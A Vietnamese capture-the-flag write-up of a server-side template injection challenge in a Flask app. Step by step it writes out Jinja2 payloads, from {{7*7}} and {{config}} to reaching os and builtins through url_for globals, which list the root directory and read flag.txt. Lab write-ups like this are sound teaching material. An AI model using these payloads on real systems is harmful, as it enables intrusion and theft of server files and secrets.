Mô tả của đề bài : We're curious at what your favourite ai model is, you can even choose your own
Ta có thể thấy bài này có 1 trường để thêm vào "your own" sau khi điền vào nó sẽ được cập nhật lựa chọn ở bên trên ( enter your own favourite )
-> ta có thể thử ngay {{7*7}} vì câu lệnh này khá là phổ biến
Kết quả cho thấy hệ thống đã tính phần 7*7 và trả ra kết quả là 49
-> Từ đây ta có thể gần như chắc chắn bài này thuộc dạng SSTI (Server-Side Template Injection)
Bước đầu tiên sau khi có hướng : ta sẽ thử enter {{config}}
Kết quả trả về là một object config rất dài, chứa các giá trị như:
DEBUG: True
SECRET_KEY: None
APPLICATION_ROOT: '/'
SESSION_COOKIE_NAME: 'session'
-> Ta sẽ thử {{config.class}} -> <class 'flask.config.Config'>
->Ta sẽ thử tìm flag ngay trong kết quả trả về của config -> nhưng trong trường hợp này không tìm thấy flag chỉ hiện cấu hình mặc định thôi
Bước 2 : Ta đổi hướng tìm các object khác như globals,builtins,os,open
Ta thử {{get_flashed_messages.globals}} thì thấy được các thành phần quan trọng như os,sys,builtins,open,request,current_app
-> phát hiện có os
-> Dùng {{url_for.globals['os'].listdir('/')}}
Ta thấy xuất hiện file flag.txt nên ta có thể xuất ra luôn được nội dung của file flag.txt -> {{url_for.globals['builtins']'open'.read()}}
kết quả trả về cho thấy flag là : RAM{ins3cure_dr0pdown}